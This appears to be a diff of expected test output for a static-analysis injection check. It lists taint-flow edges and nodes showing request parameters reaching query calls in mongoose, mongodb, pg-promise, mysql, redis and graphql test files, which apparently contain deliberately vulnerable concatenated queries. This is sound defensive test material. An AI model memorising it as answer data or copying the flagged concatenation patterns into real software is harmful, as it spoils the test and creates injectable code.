marsdb-flow-to.js:10:9:10:18 | query | provenance | | +| marsdb-flow-to.js:11:17:11:24 | req.body | marsdb-flow-to.js:11:17:11:30 | req.body.title | provenance | Config | +| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:9:10:18 | query | provenance | Config | +| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:10:17:10:18 | {} | provenance | Config | +| marsdb-flow-to.js:11:17:11:30 | req.body.title | marsdb-flow-to.js:13:17:13:21 | query | provenance | Config | +| marsdb.js:12:9:12:18 | query | marsdb.js:15:12:15:16 | query | provenance | | +| marsdb.js:12:17:12:18 | {} | marsdb.js:12:9:12:18 | query | provenance | | +| marsdb.js:13:17:13:24 | req.body | marsdb.js:13:17:13:30 | req.body.title | provenance | Config | +| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:9:12:18 | query | provenance | Config | +| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:12:17:12:18 | {} | provenance | Config | +| marsdb.js:13:17:13:30 | req.body.title | marsdb.js:15:12:15:16 | query | provenance | Config | +| minimongo.js:14:9:14:18 | query | minimongo.js:17:12:17:16 | query | provenance | | +| minimongo.js:14:17:14:18 | {} | minimongo.js:14:9:14:18 | query | provenance | | +| minimongo.js:15:17:15:24 | req.body | minimongo.js:15:17:15:30 | req.body.title | provenance | Config | +| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:9:14:18 | query | provenance | Config | +| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:14:17:14:18 | {} | provenance | Config | +| minimongo.js:15:17:15:30 | req.body.title | minimongo.js:17:12:17:16 | query | provenance | Config | +| mongodb.js:12:11:12:20 | query | mongodb.js:13:5:13:9 | query | provenance | | +| mongodb.js:12:19:12:20 | {} | mongodb.js:12:11:12:20 | query | provenance | | +| mongodb.js:13:5:13:9 | query | mongodb.js:17:16:17:20 | query | provenance | | +| mongodb.js:13:19:13:26 | req.body | mongodb.js:13:19:13:32 | req.body.title | provenance | Config | +| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:11:12:20 | query | provenance | Config | +| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:12:19:12:20 | {} | provenance | Config | +| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:13:5:13:9 | query | provenance | Config | +| mongodb.js:13:19:13:32 | req.body.title | mongodb.js:17:16:17:20 | query | provenance | Config | +| mongodb.js:25:11:25:32 | title | mongodb.js:30:38:30:42 | title | provenance | | +| mongodb.js:25:19:25:26 | req.body | mongodb.js:25:19:25:32 | req.body.title | provenance | Config | +| mongodb.js:25:19:25:32 | req.body.title | mongodb.js:25:11:25:32 | title | provenance | | +| mongodb.js:30:27:30:43 | JSON.parse(title) | mongodb.js:30:18:30:45 | { title ... itle) } | provenance | Config | +| mongodb.js:30:38:30:42 | title | mongodb.js:30:27:30:43 | JSON.parse(title) | provenance | Config | +| mongodb.js:46:11:46:20 | query | mongodb.js:47:5:47:9 | query | provenance | | +| mongodb.js:46:19:46:20 | {} | mongodb.js:46:11:46:20 | query | provenance | | +| mongodb.js:47:5:47:9 | query | mongodb.js:51:16:51:20 | query | provenance | | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:46:11:46:20 | query | provenance | Config | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:46:19:46:20 | {} | provenance | Config | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:47:5:47:9 | query | provenance | Config | +| mongodb.js:47:19:47:33 | req.query.title | mongodb.js:51:16:51:20 | query | provenance | Config | +| mongodb.js:56:8:56:17 | query | mongodb.js:57:2:57:6 | query | provenance | | +| mongodb.js:56:16:56:17 | {} | mongodb.js:56:8:56:17 | query | provenance | | +| mongodb.js:57:2:57:6 | query | mongodb.js:61:12:61:16 | query | provenance | | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:56:8:56:17 | query | provenance | Config | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:56:16:56:17 | {} | provenance | Config | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:57:2:57:6 | query | provenance | Config | +| mongodb.js:57:16:57:30 | req.query.title | mongodb.js:61:12:61:16 | query | provenance | Config | +| mongodb.js:66:7:66:25 | tag | mongodb.js:72:22:72:24 | tag | provenance | | +| mongodb.js:66:7:66:25 | tag | mongodb.js:79:20:79:22 | tag | provenance | | +| mongodb.js:66:13:66:25 | req.query.tag | mongodb.js:66:7:66:25 | tag | provenance | | +| mongodb.js:72:22:72:24 | tag | mongodb.js:72:14:72:26 | { tags: tag } | provenance | Config | +| mongodb.js:79:20:79:22 | tag | mongodb.js:79:12:79:24 | { tags: tag } | provenance | Config | +| mongodb.js:100:9:100:18 | query | mongodb.js:101:3:101:7 | query | provenance | | +| mongodb.js:100:17:100:18 | {} | mongodb.js:100:9:100:18 | query | provenance | | +| mongodb.js:101:3:101:7 | query | mongodb.js:105:14:105:18 | query | provenance | | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:100:9:100:18 | query | provenance | Config | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:100:17:100:18 | {} | provenance | Config | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:101:3:101:7 | query | provenance | Config | +| mongodb.js:101:17:101:29 | queries.title | mongodb.js:105:14:105:18 | query | provenance | Config | +| mongodb_bodySafe.js:23:11:23:20 | query | mongodb_bodySafe.js:24:5:24:9 | query | provenance | | +| mongodb_bodySafe.js:23:19:23:20 | {} | mongodb_bodySafe.js:23:11:23:20 | query | provenance | | +| mongodb_bodySafe.js:24:5:24:9 | query | mongodb_bodySafe.js:28:16:28:20 | query | provenance | | +| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:23:11:23:20 | query | provenance | Config | +| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:23:19:23:20 | {} | provenance | Config | +| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:24:5:24:9 | query | provenance | Config | +| mongodb_bodySafe.js:24:19:24:33 | req.query.title | mongodb_bodySafe.js:28:16:28:20 | query | provenance | Config | +| mongoose.js:20:8:20:17 | query | mongoose.js:21:2:21:6 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:23:22:23:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:25:17:25:21 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:27:22:27:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:29:21:29:25 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:31:28:31:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:33:16:33:20 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:35:19:35:23 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:37:28:37:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:39:28:39:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:41:28:41:32 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:43:22:43:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:45:18:45:22 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:47:22:47:26 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:49:21:49:25 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:51:32:51:36 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:53:27:53:31 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:54:8:54:12 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:57:17:57:21 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:58:10:58:14 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:59:8:59:12 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:60:7:60:11 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:61:16:61:20 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:62:12:62:16 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:63:10:63:14 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:67:37:67:41 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:68:46:68:50 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:69:47:69:51 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:90:21:90:25 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:97:14:97:18 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:99:31:99:35 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:119:38:119:42 | query | provenance | | +| mongoose.js:20:8:20:17 | query | mongoose.js:122:30:122:34 | query | provenance | | +| mongoose.js:20:16:20:17 | {} | mongoose.js:20:8:20:17 | query | provenance | | +| mongoose.js:21:2:21:6 | query | mongoose.js:23:22:23:26 | query | provenance | | +| mongoose.js:21:16:21:23 | req.body | mongoose.js:21:16:21:29 | req.body.title | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:20:8:20:17 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:20:16:20:17 | {} | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:21:2:21:6 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:23:22:23:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:25:17:25:21 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:27:22:27:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:29:21:29:25 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:31:28:31:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:33:16:33:20 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:35:19:35:23 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:37:28:37:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:39:28:39:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:41:28:41:32 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:43:22:43:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:45:18:45:22 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:47:22:47:26 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:49:21:49:25 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:51:32:51:36 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:53:27:53:31 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:54:8:54:12 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:57:17:57:21 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:58:10:58:14 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:59:8:59:12 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:60:7:60:11 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:61:16:61:20 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:62:12:62:16 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:63:10:63:14 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:67:37:67:41 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:68:46:68:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:69:47:69:51 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:71:46:71:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:73:51:73:55 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:75:46:75:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:78:46:78:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:80:51:80:55 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:82:46:82:50 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:90:21:90:25 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:97:14:97:18 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:99:31:99:35 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:119:38:119:42 | query | provenance | Config | +| mongoose.js:21:16:21:29 | req.body.title | mongoose.js:122:30:122:34 | query | provenance | Config | +| mongoose.js:23:22:23:26 | query | mongoose.js:23:21:23:27 | [query] | provenance | Config | +| mongoose.js:23:22:23:26 | query | mongoose.js:25:17:25:21 | query | provenance | | +| mongoose.js:25:17:25:21 | query | mongoose.js:27:22:27:26 | query | provenance | | +| mongoose.js:27:22:27:26 | query | mongoose.js:29:21:29:25 | query | provenance | | +| mongoose.js:29:21:29:25 | query | mongoose.js:31:28:31:32 | query | provenance | | +| mongoose.js:31:28:31:32 | query | mongoose.js:33:16:33:20 | query | provenance | | +| mongoose.js:33:16:33:20 | query | mongoose.js:35:19:35:23 | query | provenance | | +| mongoose.js:35:19:35:23 | query | mongoose.js:37:28:37:32 | query | provenance | | +| mongoose.js:37:28:37:32 | query | mongoose.js:39:28:39:32 | query | provenance | | +| mongoose.js:39:28:39:32 | query | mongoose.js:41:28:41:32 | query | provenance | | +| mongoose.js:41:28:41:32 | query | mongoose.js:43:22:43:26 | query | provenance | | +| mongoose.js:43:22:43:26 | query | mongoose.js:45:18:45:22 | query | provenance | | +| mongoose.js:45:18:45:22 | query | mongoose.js:47:22:47:26 | query | provenance | | +| mongoose.js:47:22:47:26 | query | mongoose.js:49:21:49:25 | query | provenance | | +| mongoose.js:49:21:49:25 | query | mongoose.js:51:32:51:36 | query | provenance | | +| mongoose.js:51:32:51:36 | query | mongoose.js:53:27:53:31 | query | provenance | | +| mongoose.js:53:27:53:31 | query | mongoose.js:54:8:54:12 | query | provenance | | +| mongoose.js:54:8:54:12 | query | mongoose.js:57:17:57:21 | query | provenance | | +| mongoose.js:57:17:57:21 | query | mongoose.js:58:10:58:14 | query | provenance | | +| mongoose.js:58:10:58:14 | query | mongoose.js:59:8:59:12 | query | provenance | | +| mongoose.js:59:8:59:12 | query | mongoose.js:60:7:60:11 | query | provenance | | +| mongoose.js:60:7:60:11 | query | mongoose.js:61:16:61:20 | query | provenance | | +| mongoose.js:61:16:61:20 | query | mongoose.js:62:12:62:16 | query | provenance | | +| mongoose.js:62:12:62:16 | query | mongoose.js:63:10:63:14 | query | provenance | | +| mongoose.js:63:10:63:14 | query | mongoose.js:67:37:67:41 | query | provenance | | +| mongoose.js:67:37:67:41 | query | mongoose.js:68:46:68:50 | query | provenance | | +| mongoose.js:68:46:68:50 | query | mongoose.js:69:47:69:51 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:71:46:71:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:73:51:73:55 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:75:46:75:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:78:46:78:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:80:51:80:55 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:82:46:82:50 | query | provenance | | +| mongoose.js:69:47:69:51 | query | mongoose.js:90:21:90:25 | query | provenance | | +| mongoose.js:90:21:90:25 | query | mongoose.js:97:14:97:18 | query | provenance | | +| mongoose.js:97:14:97:18 | query | mongoose.js:99:31:99:35 | query | provenance | | +| mongoose.js:99:31:99:35 | query | mongoose.js:119:38:119:42 | query | provenance | | +| mongoose.js:101:6:101:22 | id | mongoose.js:109:20:109:21 | id | provenance | | +| mongoose.js:101:6:101:22 | id | mongoose.js:116:23:116:24 | id | provenance | | +| mongoose.js:101:11:101:22 | req.query.id | mongoose.js:101:6:101:22 | id | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:102:22:102:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:103:21:103:24 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:104:21:104:24 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:105:18:105:21 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:106:22:106:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:107:16:107:19 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:108:19:108:22 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:110:28:110:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:111:28:111:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:112:28:112:31 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:113:18:113:21 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:114:22:114:25 | cond | provenance | | +| mongoose.js:101:25:101:45 | cond | mongoose.js:115:21:115:24 | cond | provenance | | +| mongoose.js:101:32:101:45 | req.query.cond | mongoose.js:101:25:101:45 | cond | provenance | | +| mongoose.js:116:23:116:24 | id | mongoose.js:116:16:116:26 | { _id: id } | provenance | Config | +| mongoose.js:119:38:119:42 | query | mongoose.js:122:30:122:34 | query | provenance | | +| mongooseJsonParse.js:19:11:19:20 | query | mongooseJsonParse.js:22:19:22:23 | query | provenance | | +| mongooseJsonParse.js:19:19:19:20 | {} | mongooseJsonParse.js:19:11:19:20 | query | provenance | | +| mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | provenance | Config | +| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:11:19:20 | query | provenance | Config | +| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:19:19:19:20 | {} | provenance | Config | +| mongooseJsonParse.js:20:19:20:50 | JSON.pa ... ).title | mongooseJsonParse.js:22:19:22:23 | query | provenance | Config | +| mongooseJsonParse.js:20:30:20:43 | req.query.data | mongooseJsonParse.js:20:19:20:44 | JSON.pa ... y.data) | provenance | Config | +| mongooseModelClient.js:10:7:10:32 | v | mongooseModelClient.js:11:22:11:22 | v | provenance | | +| mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | mongooseModelClient.js:10:7:10:32 | v | provenance | | +| mongooseModelClient.js:10:22:10:29 | req.body | mongooseModelClient.js:10:22:10:31 | req.body.x | provenance | Config | +| mongooseModelClient.js:10:22:10:31 | req.body.x | mongooseModelClient.js:10:11:10:32 | JSON.pa ... body.x) | provenance | Config | +| mongooseModelClient.js:11:22:11:22 | v | mongooseModelClient.js:11:16:11:24 | { id: v } | provenance | Config | +| mongooseModelClient.js:12:22:12:29 | req.body | mongooseModelClient.js:12:22:12:32 | req.body.id | provenance | Config | +| mongooseModelClient.js:12:22:12:32 | req.body.id | mongooseModelClient.js:12:16:12:34 | { id: req.body.id } | provenance | Config | +| mysql.js:6:9:6:31 | temp | mysql.js:15:62:15:65 | temp | provenance | | +| mysql.js:6:9:6:31 | temp | mysql.js:19:70:19:73 | temp | provenance | | +| mysql.js:6:16:6:31 | req.params.value | mysql.js:6:9:6:31 | temp | provenance | | +| mysql.js:15:62:15:65 | temp | mysql.js:15:18:15:65 | 'SELECT ... + temp | provenance | | +| mysql.js:19:70:19:73 | temp | mysql.js:19:26:19:73 | 'SELECT ... + temp | provenance | | +| pg-promise-types.ts:7:9:7:28 | taint | pg-promise-types.ts:8:17:8:21 | taint | provenance | | +| pg-promise-types.ts:7:17:7:28 | req.params.x | pg-promise-types.ts:7:9:7:28 | taint | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:9:10:9:14 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:10:11:10:15 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:11:17:11:21 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:12:10:12:14 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:13:12:13:16 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:14:18:14:22 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:15:11:15:15 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:16:10:16:14 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:17:16:17:20 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:18:12:18:16 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:19:13:19:17 | query | provenance | | +| pg-promise.js:6:7:7:55 | query | pg-promise.js:22:11:22:15 | query | provenance | | +| pg-promise.js:7:16:7:34 | req.params.category | pg-promise.js:6:7:7:55 | query | provenance | | +| pg-promise.js:9:10:9:14 | query | pg-promise.js:10:11:10:15 | query | provenance | | +| pg-promise.js:10:11:10:15 | query | pg-promise.js:11:17:11:21 | query | provenance | | +| pg-promise.js:11:17:11:21 | query | pg-promise.js:12:10:12:14 | query | provenance | | +| pg-promise.js:12:10:12:14 | query | pg-promise.js:13:12:13:16 | query | provenance | | +| pg-promise.js:13:12:13:16 | query | pg-promise.js:14:18:14:22 | query | provenance | | +| pg-promise.js:14:18:14:22 | query | pg-promise.js:15:11:15:15 | query | provenance | | +| pg-promise.js:15:11:15:15 | query | pg-promise.js:16:10:16:14 | query | provenance | | +| pg-promise.js:16:10:16:14 | query | pg-promise.js:17:16:17:20 | query | provenance | | +| pg-promise.js:17:16:17:20 | query | pg-promise.js:18:12:18:16 | query | provenance | | +| pg-promise.js:18:12:18:16 | query | pg-promise.js:19:13:19:17 | query | provenance | | +| pg-promise.js:19:13:19:17 | query | pg-promise.js:22:11:22:15 | query | provenance | | +| pg-promise.js:22:11:22:15 | query | pg-promise.js:60:20:60:24 | query | provenance | | +| pg-promise.js:22:11:22:15 | query | pg-promise.js:63:23:63:27 | query | provenance | | +| pg-promise.js:22:11:22:15 | query | pg-promise.js:64:16:64:20 | query | provenance | | +| redis.js:10:16:10:23 | req.body | redis.js:10:16:10:27 | req.body.key | provenance | Config | +| redis.js:12:9:12:26 | key | redis.js:13:16:13:18 | key | provenance | | +| redis.js:12:9:12:26 | key | redis.js:18:16:18:18 | key | provenance | | +| redis.js:12:9:12:26 | key | redis.js:19:43:19:45 | key | provenance | | +| redis.js:12:9:12:26 | key | redis.js:25:14:25:16 | key | provenance | | +| redis.js:12:9:12:26 | key | redis.js:26:14:26:16 | key | provenance | | +| redis.js:12:9:12:26 | key | redis.js:32:28:32:30 | key | provenance | | +| redis.js:12:15:12:22 | req.body | redis.js:12:15:12:26 | req.body.key | provenance | Config | +| redis.js:12:15:12:26 | req.body.key | redis.js:12:9:12:26 | key | provenance | | +| redis.js:13:16:13:18 | key | redis.js:18:16:18:18 | key | provenance | | +| redis.js:18:16:18:18 | key | redis.js:19:43:19:45 | key | provenance | | +| redis.js:19:43:19:45 | key | redis.js:25:14:25:16 | key | provenance | | +| redis.js:25:14:25:16 | key | redis.js:26:14:26:16 | key | provenance | | +| redis.js:26:14:26:16 | key | redis.js:30:23:30:25 | key | provenance | | +| redis.js:26:14:26:16 | key | redis.js:32:28:32:30 | key | provenance | | +| redis.js:38:11:38:28 | key | redis.js:39:16:39:18 | key | provenance | | +| redis.js:38:11:38:28 | key | redis.js:43:27:43:29 | key | provenance | | +| redis.js:38:11:38:28 | key | redis.js:46:34:46:36 | key | provenance | | +| redis.js:38:17:38:24 | req.body | redis.js:38:17:38:28 | req.body.key | provenance | Config | +| redis.js:38:17:38:28 | req.body.key | redis.js:38:11:38:28 | key | provenance | | +| socketio.js:10:25:10:30 | handle | socketio.js:11:46:11:51 | handle | provenance | | +| socketio.js:11:46:11:51 | handle | socketio.js:11:12:11:53 | `INSERT ... andle}` | provenance | | +| tst2.js:8:66:8:78 | req.params.id | tst2.js:8:27:8:84 | "select ... d + "'" | provenance | | +| tst3.js:7:7:8:55 | query1 | tst3.js:9:14:9:19 | query1 | provenance | | +| tst3.js:8:16:8:34 | req.params.category | tst3.js:7:7:8:55 | query1 | provenance | | +| tst4.js:8:46:8:60 | $routeParams.id | tst4.js:8:10:8:66 | 'SELECT ... d + '"' | provenance | | +| tst.js:10:46:10:58 | req.params.id | tst.js:10:10:10:64 | 'SELECT ... d + '"' | provenance | | nodes | graphql.js:8:11:8:28 | id | semmle.label | id | | graphql.js:8:16:8:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:10:34:20:5 | `\\n ... }\\n ` | semmle.label | `\\n ... }\\n ` | -| graphql.js:12:46:12:47 | id | semmle.label | id | -| graphql.js:26:11:26:28 | id | semmle.label | id | -| graphql.js:26:16:26:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:27:30:27:40 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:27:37:27:38 | id | semmle.label | id | -| graphql.js:30:32:30:42 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:30:39:30:40 | id | semmle.label | id | -| graphql.js:33:18:33:28 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:33:25:33:26 | id | semmle.label | id | -| graphql.js:39:11:39:28 | id | semmle.label | id | -| graphql.js:39:16:39:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:44:14:44:24 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:44:21:44:22 | id | semmle.label | id | -| graphql.js:48:44:48:54 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:48:51:48:52 | id | semmle.label | id | -| graphql.js:55:11:55:28 | id | semmle.label | id | -| graphql.js:55:16:55:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:56:39:56:49 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:56:46:56:47 | id | semmle.label | id | -| graphql.js:58:66:58:76 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:58:73:58:74 | id | semmle.label | id | -| graphql.js:74:9:74:25 | id | semmle.label | id | -| graphql.js:74:14:74:25 | req.query.id | semmle.label | req.query.id | -| graphql.js:75:46:75:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | -| graphql.js:75:56:75:57 | id | semmle.label | id | -| graphql.js:84:14:90:8 | `{\\n ... }` | semmle.label | `{\\n ... }` | -| graphql.js:88:13:88:14 | id | semmle.label | id | -| graphql.js:119:11:119:28 | id | semmle.label | id | -| graphql.js:119:16:119:28 | req.params.id | semmle.label | req.params.id | -| graphql.js:120:38:120:48 | `foo ${id}` | semmle.label | `foo ${id}` | -| graphql.js:120:45:120:46 | id | semmle.label | id | +| graphql.js:9:34:19:5 | `\\n ... }\\n ` | semmle.label | `\\n ... }\\n ` | +| graphql.js:11:46:11:47 | id | semmle.label | id | +| graphql.js:25:11:25:28 | id | semmle.label | id | +| graphql.js:25:16:25:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:26:30:26:40 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:26:37:26:38 | id | semmle.label | id | +| graphql.js:29:32:29:42 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:29:39:29:40 | id | semmle.label | id | +| graphql.js:32:18:32:28 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:32:25:32:26 | id | semmle.label | id | +| graphql.js:38:11:38:28 | id | semmle.label | id | +| graphql.js:38:16:38:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:43:14:43:24 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:43:21:43:22 | id | semmle.label | id | +| graphql.js:47:44:47:54 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:47:51:47:52 | id | semmle.label | id | +| graphql.js:54:11:54:28 | id | semmle.label | id | +| graphql.js:54:16:54:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:55:39:55:49 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:55:46:55:47 | id | semmle.label | id | +| graphql.js:57:66:57:76 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:57:73:57:74 | id | semmle.label | id | +| graphql.js:73:9:73:25 | id | semmle.label | id | +| graphql.js:73:14:73:25 | req.query.id | semmle.label | req.query.id | +| graphql.js:74:46:74:64 | "{ foo" + id + " }" | semmle.label | "{ foo" + id + " }" | +| graphql.js:74:56:74:57 | id | semmle.label | id | +| graphql.js:82:14:88:8 | `{\\n ... }` | semmle.label | `{\\n ... }` | +| graphql.js:86:13:86:14 | id | semmle.label | id | +| graphql.js:117:11:117:28 | id | semmle.label | id | +| graphql.js:117:16:117:28 | req.params.id | semmle.label | req.params.id | +| graphql.js:118:38:118:48 | `foo ${id}` | semmle.label | `foo ${id}` | +| graphql.js:118:45:118:46 | id | semmle.label | id | | html-sanitizer.js:13:39:13:44 | param1 | semmle.label | param1 | | html-sanitizer.js:14:5:14:24 | param1 | 